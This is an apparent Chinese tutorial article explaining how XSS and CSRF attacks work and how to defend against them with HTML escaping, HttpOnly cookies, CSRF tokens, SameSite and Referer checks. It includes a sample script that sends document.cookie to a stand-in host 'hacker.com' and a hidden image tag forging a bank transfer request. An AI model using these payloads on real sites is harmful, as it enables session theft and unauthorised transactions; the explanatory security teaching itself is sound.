当前位置：首页 > article >正文

详解：XSS 攻击和 CSRF 攻击

article 2026/5/19 17:03:43

一、先看看核心区别XSS偷你的身份-》在你的浏览器里面跑恶意JS 主动拿你的Cookie冒充你。CSRF借你的身份-》不偷你的Cookie而是利用浏览器自带Cookie 的属性骗网站替你做事。二、XSS 讲解1、核心本质网站没有过滤用户输入让黑客往页面植入了恶意JS。只要别人打开这个页面恶意代码就在用户的浏览器本地执行。2、简单例子帮你理解比如说一个网页的评论区黑客在评论区发了一段偷Cookie 的JS。你登陆了网页浏览器存了你的登录Cookie你点开了这条评论网站直接把黑客写的script原样渲染到页面上浏览器一看有script 直接在你电脑上运行代码读取document.cookie 就把你的登陆凭证发给黑客黑客拿着你的Cookie 就能登录你的账号。比如黑客在评论区发了script // 偷你的 cookie 发给黑客服务器 fetch(http://hacker.com/steal?cdocument.cookie) /script3、XSS 两大防御HTML 转义把转义成普通字符让核心不让恶意代码变成可执行脚本Cookie 设 HttpOnly禁止 JS 读取document.cookie。注意只能防偷 Cookie防不了 XSS 代码执行还是能弹弹窗、篡改页面所以说还是不安全这里推荐使用HTML 转义。三、CSRF 讲解1、核心本质你登陆了A 网站没有退出然后你又点开恶意网站B。B 网站偷偷发一个请求到A 网站浏览器自动带上A 网站的Cookie。A 网站分不清是你手动操作还是恶意网站代发直接就执行了操作。2、简单例子帮你理解你登录了网银浏览器存了网银 Cookie你乱点链接进了一个垃圾网页垃圾网页藏了个隐藏图片 / 接口请求直接请求银行转账接口浏览器发请求时自动带上你的网银Cookie银行服务器看到 Cookie 是合法的直接转账成功。比如用户已登录银行网站此时访问了一个恶意页面页面中隐藏了一段代码img srchttps://bank.com/transfer?toAccount攻击者卡号money10000 styledisplay:none;为什么CSRF 不用偷Cookie 浏览器有个机制访问某域名时自动带上该域名下所有 Cookie不用黑客手动拿。3、CSRF 防御机制第一种CSRF Token最常用流程后端给每个用户生成唯一随机 Token藏在页面 meta / 隐藏表单里正常用户发请求必须带上这个 Token后端校验 Token 对不对不对直接拒绝。为什么防得住同源策略恶意网站读不到你银行页面的内容拿不到 Token没有 Token伪造请求直接作废。第二种Cookie SameSite 属性SameSiteStrict彻底禁止跨站请求带 CookieSameSiteLax宽松模式普通链接允许表单 / 接口跨站不带 Cookie现代默认。直接从浏览器层面堵死「跨站自动带 Cookie」。第三种校验 Referer / Origin看请求是从哪个域名发过来的只允许自己官网域名的请求陌生来源直接拦截。四、小结XSS是往网站注入恶意JS偷你Cookie冒充你靠输入转义Cookie设HttpOnly防护。CSRF是利用浏览器自动带Cookie的特性恶意网站偷偷冒用你的身份发请求靠CSRF令牌、SameSite、校验请求来源防护。

详解：XSS 攻击和 CSRF 攻击

相关文章：

详解：XSS 攻击和 CSRF 攻击

解锁Nintendo Switch游戏备份的终极指南：nxdumptool完全攻略

终极指南：5步掌握MPh，让COMSOL仿真效率提升300%

2026年热门抠图软件怎么选？好用的抠图工具实测对比指南

生成式 AI 的成本暗礁：FinOps 如何照亮从试点到规模化的全链路

解密冰蝎和蚁剑：在CTF流量分析中如何识别和还原WebShell攻击（含AES/Base64解密实操）

EB Garamond 12终极指南：如何免费获取经典优雅的学术排版字体

PlotSquared 终极指南：如何在 Minecraft 服务器上安装和配置强大的领地管理插件

龙芯2K3000与国产OS在轨道交通AFC系统中的工程实践

LLaMA论文里没细说的三个“小”改进：RMSNorm、SwiGLU和RoPE到底强在哪？

别再只盯着时序图了！FPGA驱动AD7606的8通道同步采样，这3个实战细节才是关键

手把手教你用Cubic为团队批量定制Ubuntu服务器模板镜像（含安全加固步骤）

多VM同时启动卡爆？2种方法设置启动延迟，避免启动风暴

告别卡顿！用WebRTC-Streamer在浏览器里丝滑播放海康/大华监控（附完整代码）

为Cursor IDE定制AI代码生成规则：打造波士顿动力级精准开发助手

Thorium浏览器实战指南：为什么这个Chromium分支能让你告别卡顿与隐私泄露？

Taotoken稳定直连与路由策略保障了我的线上服务SLA

DiffuGen：基于扩散模型的代码生成技术原理与应用前景

Inkscape实战：用蒙版给你的Logo或文字快速添加酷炫的渐变效果

企业无线组网避坑指南：AP发现AC失败？从DHCP Option 43配置到防火墙策略的排查清单

高性能Go Web框架Volo：设计原理、核心功能与生产实践

3分钟告别窗口切换烦恼：Borderless Gaming让你的游戏体验无缝衔接

别再只用Hydra了！这5个SSH安全加固技巧，让你的服务器告别暴力破解

别再只画光路了！用OpticStudio偏振光瞳图，一眼看懂你的激光系统偏振态

别再瞎算了！用Excel 5分钟搞定18650锂电池续航与充电时间（附免费模板）

Adams新手避坑指南：从Box到拉伸体，教你正确给几何模型‘赋予灵魂’（含质量设置）

如何免费下载网页视频？VideoDownloadHelper浏览器插件终极指南

JiYuTrainer高效实用指南：3步解锁极域电子教室控制，恢复电脑操作自由

拆解Xilinx UltraScale GTH收发器时钟网络：从QPLL/CPLL选择到TXUSRCLK生成的全链路分析

二维码识读设备选购全攻略：从核心需求到实战测试